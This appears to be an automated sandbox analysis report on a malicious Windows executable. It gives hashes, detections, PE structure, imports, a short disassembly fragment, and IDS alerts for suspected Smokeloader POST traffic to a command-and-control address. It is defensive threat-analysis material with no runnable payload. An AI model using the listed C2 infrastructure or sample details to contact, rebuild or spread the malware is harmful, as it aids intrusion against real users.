                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..A.........f......f.).)..f...u....$..........f......f.-....f.*....Rich...........................PE..L......e.............................7............@.................................X...........................................d...................................P...............................P...@...............(............................text............................... ..`.rdata..^...........................@..@.data............^..................@....rsrc................\..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):290443
                                                                      Entropy (8bit):7.999440393337273
                                                                      Encrypted:true
                                                                      SSDEEP:6144:Qz0fL6VSYDpmMT0nVg4b3kNJUlNXuN4sK1+U4x5rr7GEiuRdEUw:Qz0DW7B+Vg4QNJUzXueQ9r7tnSUw
                                                                      MD5:44C873B7F02FED2FD5FE488632916CBA
                                                                      SHA1:973C068E2E68C410DAEACF26B34E3546647BAA3E
                                                                      SHA-256:B55DB18169B00DEE9FCAA99414117DFA088BC45EC27FA82EA18F34D1BB5E290F
                                                                      SHA-512:B6C8EE1D692DB73C3CEDDCB8FE92E3DAF82504469C399820ABF2777DC180685657E77EAB555A98CE4A3980FB5A8C528D3BF69F09C9CBA3C6849DAEB6621F0648
                                                                      Malicious:false
                                                                      Preview:.... .q.[...&...p....b...-....../......[....'.T....GY*YC....Qd.....W.0.......|..?..0.....k ?.-..o.K._..M...DY.......F~.R$.:r.~.U..yK!.7,M.K.P...__./.%\.....A..........;...l.......>^].n#gb.?.q.v..*..K>..:n..{.@...O\...4..6$.e.N.. \8W\.....7....@Ya. .Y..T.7yQ.Q.p..m..A{.M..#......>.. .&....%.....C.*b...G..b.....{...k..jH.%v....%>pu^.(SiH....W.v."....0..>Q?./B7..._.*cZ..3..x"..@.....E.G.I..8/H.2.....Hp....S..H.....v..o:.`./}R.....$...Us..4.~.M}..^.p......*:.m.Ce...&.1I..jS.r.....*hK....,rv..udy .C`C... ...!_.8...X...,.`.{d8....e19B..F..P.)..g:...i. U........a%..`.gF?.3.......+....v......Fr.O..6p..`>NZ.}|..........\.#t9.5.G..L...h.....y..._~].lz...!/j.{m..L.>.!jT..f8.&.*.....i%..EL?..'..{.8b...D/.._1DV.......P.5..X.../d.G..|.p...U...a......y..T=...v...aHA._...n.ryh5.V.u......5....@.h.{...q..p0........t.*#6..j..._*N....h.$.^..8...&T..w.5?@...Q^..x.@.UDm....,.2..C0..{..eD/F.B...Y.s.x.p|.....DN.M.....f.?..;..#.a...\>'..........T.,........j[.h....X
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):417280
                                                                      Entropy (8bit):6.850109840048764
                                                                      Encrypted:false
                                                                      SSDEEP:6144:qg+Ov/uYh8vkotYJjh+qCeNKkzXlGIXhh1/pYgzquE6Y2T3:yOv9h8vF8+qekzEClYhu1YA
                                                                      MD5:1A29ED2D1AE240EC1D6F50DCC960BAA3
                                                                      SHA1:CAF7120A216A3A39BEE558A6A660F1FFC214A712
                                                                      SHA-256:2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                                                                      SHA-512:B5ABBB5ED0431F80E429849C4B45CE1A35A2D123E63520D8863A9817B6A599CC20A2B433B59162E48F546B0D335F16B717A2BEF70F207D3195D5955E70A51BAB
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Joe Sandbox View:
• Filename: file.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..A.........`......`.)./..`...s....$..........`......`.-....`.*....Rich...........................PE..L...Kt.e............................S8............@..................................5..........................................d.......P...........................0...............................0...@...............0............................text..."........................... ..`.rdata..x...........................@..@.data............^..................@....rsrc...P............X..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.853098055766101
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:KTh1gQlT9a.exe
                                                                      File size:418'304 bytes
                                                                      MD5:6d9b8ff6442e3c42a7ad0e1238960057
                                                                      SHA1:fab711b446c2cc55f97c7a5afaa9f9833e01a0ea
                                                                      SHA256:a641af0462259586cf10b8867653e163f73b6066106455605643b08ab829ac77
                                                                      SHA512:dc71917d187f65526ad9218d1db79d83752df9017d72ef5afc5607567a4e3b20e3ac77d5c765fcce7f9f18ce8524bed0181db09028a29b832e1928579ee3ce98
                                                                      SSDEEP:6144:lwpk63+zRADFXmigaB0r9v1FkJNdj4E5nkJv23J7quw2T6:+pkQ+zRAhXmiLQ9vmaElkJv2YuwJ
                                                                      TLSH:0A949E439295BF70F5278B729E3EC6FA362EF5624E15276722167E2F24B01B1C123B11
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..A............f.......f.).)...f...u.....$.............f.......f.-.....f.*.....Rich............................PE..L......e...
                                                                      Icon Hash:432d49455545610d
                                                                      Entrypoint:0x4037e3
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x65190115 [Sun Oct 1 05:18:13 2023 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:a11cbe8ba3528a436618e8dc32e663a6
                                                                      Instruction
                                                                      call 00007F7F6D3F25E1h
                                                                      jmp 00007F7F6D3EEA8Eh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      call 00007F7F6D3EEC3Ch
                                                                      xchg cl, ch
                                                                      jmp 00007F7F6D3EEC24h
                                                                      call 00007F7F6D3EEC33h
                                                                      fxch st(0), st(1)
                                                                      jmp 00007F7F6D3EEC1Bh
                                                                      fabs
                                                                      fld1
                                                                      mov ch, cl
                                                                      xor cl, cl
                                                                      jmp 00007F7F6D3EEC11h
                                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                      fabs
                                                                      fxch st(0), st(1)
                                                                      fabs
                                                                      fxch st(0), st(1)
                                                                      fpatan
                                                                      or cl, cl
                                                                      je 00007F7F6D3EEC06h
                                                                      fldpi
                                                                      fsubrp st(1), st(0)
                                                                      or ch, ch
                                                                      je 00007F7F6D3EEC04h
                                                                      fchs
                                                                      ret
                                                                      fabs
                                                                      fld st(0), st(0)
                                                                      fld st(0), st(0)
                                                                      fld1
                                                                      fsubrp st(1), st(0)
                                                                      fxch st(0), st(1)
                                                                      fld1
                                                                      faddp st(1), st(0)
                                                                      fmulp st(1), st(0)
                                                                      ftst
                                                                      wait
                                                                      fstsw word ptr [ebp-000000A0h]
                                                                      wait
                                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                                      jne 00007F7F6D3EEC07h
                                                                      xor ch, ch
                                                                      fsqrt
                                                                      ret
                                                                      pop eax
                                                                      jmp 00007F7F6D3F11BFh
                                                                      fstp st(0)
                                                                      fld tbyte ptr [0041169Ah]
                                                                      ret
                                                                      fstp st(0)
                                                                      or cl, cl
                                                                      je 00007F7F6D3EEC0Dh
                                                                      fstp st(0)
                                                                      fldpi
                                                                      or ch, ch
                                                                      je 00007F7F6D3EEC04h
                                                                      fchs
                                                                      ret
                                                                      fstp st(0)
                                                                      fldz
                                                                      or ch, ch
                                                                      je 00007F7F6D3EEBF9h
                                                                      fchs
                                                                      ret
                                                                      fstp st(0)
                                                                      jmp 00007F7F6D3F1195h
                                                                      fstp st(0)
                                                                      mov cl, ch
                                                                      jmp 00007F7F6D3EEC02h
                                                                      call 00007F7F6D3EEBCEh
                                                                      jmp 00007F7F6D3F11A0h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFD30h
                                                                      push ebx
                                                                      Programming Language:
                                                                      • [C++] VS2010 build 30319
                                                                      • [ASM] VS2010 build 30319
                                                                      • [ C ] VS2010 build 30319
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [RES] VS2010 build 30319
                                                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x401ec | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x205d000 | 0x205f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x40250 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3fd50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11000 | 0x228 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xf902 | 0xfa00 | 0c7692f809d27d3cbe79f0737eb653d1 | False | 0.607578125 | data | 6.752865043333725 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x11000 | 0x2fe5e | 0x30000 | 9e3cc5cd4ffabcb9b8e7b61c208a536a | False | 0.943634033203125 | data | 7.882502718965042 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x41000 | 0x201b210 | 0x5e00 | 897d780e40efc176535680455956439a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x205d000 | 0x205f8 | 0x20600 | c92d339fbbfb0fecdfde5b457ff3e6ce | False | 0.4008430863899614 | data | 4.74374319544498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
ZAVUTIDORAMACE | 0x2076498 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | India | 0.588821322292664
ZAVUTIDORAMACE | 0x2076498 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | Sri Lanka | 0.588821322292664
RT_CURSOR | 0x2078308 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.26439232409381663
RT_CURSOR | 0x20791b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.3686823104693141
RT_CURSOR | 0x2079a58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.49060693641618497
RT_CURSOR | 0x2079ff0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375
RT_CURSOR | 0x207a120 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635
RT_CURSOR | 0x207a1f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.27238805970149255
RT_CURSOR | 0x207b0a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.375
RT_CURSOR | 0x207b948 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5057803468208093
RT_ICON | 0x205db00 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.4349680170575693
RT_ICON | 0x205db00 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.4349680170575693
RT_ICON | 0x205e9a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5374548736462094
RT_ICON | 0x205e9a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5374548736462094
RT_ICON | 0x205f250 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.5996543778801844
RT_ICON | 0x205f250 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.5996543778801844
RT_ICON | 0x205f918 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6748554913294798
RT_ICON | 0x205f918 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6748554913294798
RT_ICON | 0x205fe80 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.3287344398340249
RT_ICON | 0x205fe80 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.3287344398340249
RT_ICON | 0x2062428 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Tamil | India | 0.40361163227016883
RT_ICON | 0x2062428 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Tamil | Sri Lanka | 0.40361163227016883
RT_ICON | 0x20634d0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Tamil | India | 0.4663934426229508
RT_ICON | 0x20634d0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Tamil | Sri Lanka | 0.4663934426229508
RT_ICON | 0x2063e58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.5549645390070922
RT_ICON | 0x2063e58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.5549645390070922
RT_ICON | 0x2064338 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.36433901918976547
RT_ICON | 0x2064338 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.36433901918976547
RT_ICON | 0x20651e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.4526173285198556
RT_ICON | 0x20651e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.4526173285198556
RT_ICON | 0x2065a88 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.45910138248847926
RT_ICON | 0x2065a88 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.45910138248847926
RT_ICON | 0x2066150 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.45303468208092484
RT_ICON | 0x2066150 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.45303468208092484
                                                                      RT_ICON0x20666b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2654564315352697
                                                                      RT_ICON0x20666b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2654564315352697
                                                                      RT_ICON0x2068c600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30651969981238275
                                                                      RT_ICON0x2068c600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30651969981238275
                                                                      RT_ICON0x2069d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.35726950354609927
                                                                      RT_ICON0x2069d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.35726950354609927
                                                                      RT_ICON0x206a1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.560501066098081
                                                                      RT_ICON0x206a1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.560501066098081
                                                                      RT_ICON0x206b0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5505415162454874
                                                                      RT_ICON0x206b0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5505415162454874
                                                                      RT_ICON0x206b9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6105491329479769
                                                                      RT_ICON0x206b9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6105491329479769
                                                                      RT_ICON0x206be900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4589211618257261
                                                                      RT_ICON0x206be900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4589211618257261
                                                                      RT_ICON0x206e4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.48686679174484054
                                                                      RT_ICON0x206e4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.48686679174484054
                                                                      RT_ICON0x206f4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4971311475409836
                                                                      RT_ICON0x206f4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4971311475409836
                                                                      RT_ICON0x206fe680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                                                      RT_ICON0x206fe680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                                                      RT_ICON0x20703380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.488272921108742
                                                                      RT_ICON0x20703380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.488272921108742
                                                                      RT_ICON0x20711e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4697653429602888
                                                                      RT_ICON0x20711e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4697653429602888
                                                                      RT_ICON0x2071a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.434971098265896
                                                                      RT_ICON0x2071a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.434971098265896
                                                                      RT_ICON0x2071ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2773858921161826
                                                                      RT_ICON0x2071ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2773858921161826
                                                                      RT_ICON0x20745980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2898686679174484
                                                                      RT_ICON0x20745980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2898686679174484
                                                                      RT_ICON0x20756400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3069672131147541
                                                                      RT_ICON0x20756400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3069672131147541
                                                                      RT_ICON0x2075fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3395390070921986
                                                                      RT_ICON0x2075fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3395390070921986
                                                                      RT_DIALOG0x207c1380x58data0.8977272727272727
                                                                      RT_STRING0x207c1900x38cdataTamilIndia0.473568281938326
                                                                      RT_STRING0x207c1900x38cdataTamilSri Lanka0.473568281938326
                                                                      RT_STRING0x207c5200x56edataTamilIndia0.44316546762589926
                                                                      RT_STRING0x207c5200x56edataTamilSri Lanka0.44316546762589926
                                                                      RT_STRING0x207ca900x2c6dataTamilIndia0.4732394366197183
                                                                      RT_STRING0x207ca900x2c6dataTamilSri Lanka0.4732394366197183
                                                                      RT_STRING0x207cd580x4a2dataTamilIndia0.448566610455312
                                                                      RT_STRING0x207cd580x4a2dataTamilSri Lanka0.448566610455312
                                                                      RT_STRING0x207d2000x3f6dataTamilIndia0.4428007889546351
                                                                      RT_STRING0x207d2000x3f6dataTamilSri Lanka0.4428007889546351
                                                                      RT_ACCELERATOR0x20782d00x38dataTamilIndia0.9107142857142857
                                                                      RT_ACCELERATOR0x20782d00x38dataTamilSri Lanka0.9107142857142857
                                                                      RT_GROUP_CURSOR0x2079fc00x30data0.9375
                                                                      RT_GROUP_CURSOR0x207a1d00x22data1.0588235294117647
                                                                      RT_GROUP_CURSOR0x207beb00x30data0.9375
                                                                      RT_GROUP_ICON0x20702d00x68dataTamilIndia0.7115384615384616
                                                                      RT_GROUP_ICON0x20702d00x68dataTamilSri Lanka0.7115384615384616
                                                                      RT_GROUP_ICON0x20642c00x76dataTamilIndia0.6610169491525424
                                                                      RT_GROUP_ICON0x20642c00x76dataTamilSri Lanka0.6610169491525424
                                                                      RT_GROUP_ICON0x206a1700x68dataTamilIndia0.7115384615384616
                                                                      RT_GROUP_ICON0x206a1700x68dataTamilSri Lanka0.7115384615384616
                                                                      RT_GROUP_ICON0x20764300x68dataTamilIndia0.7211538461538461
                                                                      RT_GROUP_ICON0x20764300x68dataTamilSri Lanka0.7211538461538461
                                                                      RT_VERSION0x207bee00x258data0.5466666666666666
DLL | Import
KERNEL32.dll | InterlockedDecrement, GetCurrentProcess, SetEnvironmentVariableW, CreateJobObjectW, SetComputerNameW, CreateHardLinkA, GetModuleHandleW, EnumCalendarInfoExW, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, GetCalendarInfoW, CreateEventA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetVersionExW, GetFileAttributesA, EnumSystemCodePagesA, GetTimeFormatW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, SetThreadPriority, GetTempPathW, VerifyVersionInfoW, GlobalUnfix, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, EnumCalendarInfoW, CreateNamedPipeA, LoadModule, GlobalFree, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, LocalAlloc, SetCalendarInfoW, FoldStringA, EnumDateFormatsA, GlobalUnWire, GetProcessShutdownParameters, LoadLibraryExA, GetFileTime, WaitForDebugEvent, OpenEventW, GetShortPathNameW, SetFileShortNameA, GetDiskFreeSpaceExW, LCMapStringW, CommConfigDialogW, ReadFile, GetProcessHeap, SetEndOfFile, GetStringTypeW, MultiByteToWideChar, CreateFileW, WriteConsoleW, InterlockedIncrement, GetConsoleAliasExesA, TlsGetValue, SetFilePointer, GetProcAddress, SetDefaultCommConfigA, FlushFileBuffers, SetStdHandle, HeapFree, EncodePointer, DecodePointer, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, Sleep, HeapSize, ExitProcess, RtlUnwind, HeapAlloc, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA
USER32.dll | GetWindowLongW, SetCaretPos, CharUpperA, InsertMenuItemW, DrawStateA, LoadMenuA, CharLowerBuffA, GetSysColor, GetMenuStringA, SetMenu
GDI32.dll | GetBkMode, CreateDCW, GetCharWidth32W, GetTextCharset, GetCharWidthI
WINHTTP.dll | WinHttpCloseHandle
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T16:01:30.964560+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49711 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:32.199413+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49712 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:33.468152+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49713 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:34.746162+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49714 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:36.015287+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49715 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:37.606649+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49716 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:39.026227+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49717 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:40.325430+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49718 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:41.599554+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49719 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:42.875381+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49720 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:44.128986+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49721 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:45.386549+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49722 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:46.759129+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49723 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:48.049798+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49724 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:49.324358+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49725 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:50.596094+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49726 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:51.861069+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49727 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:53.130512+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49728 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:54.403705+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49729 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:55.668995+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49730 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:58.462541+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49732 | 116.58.10.60 | 80 | TCP
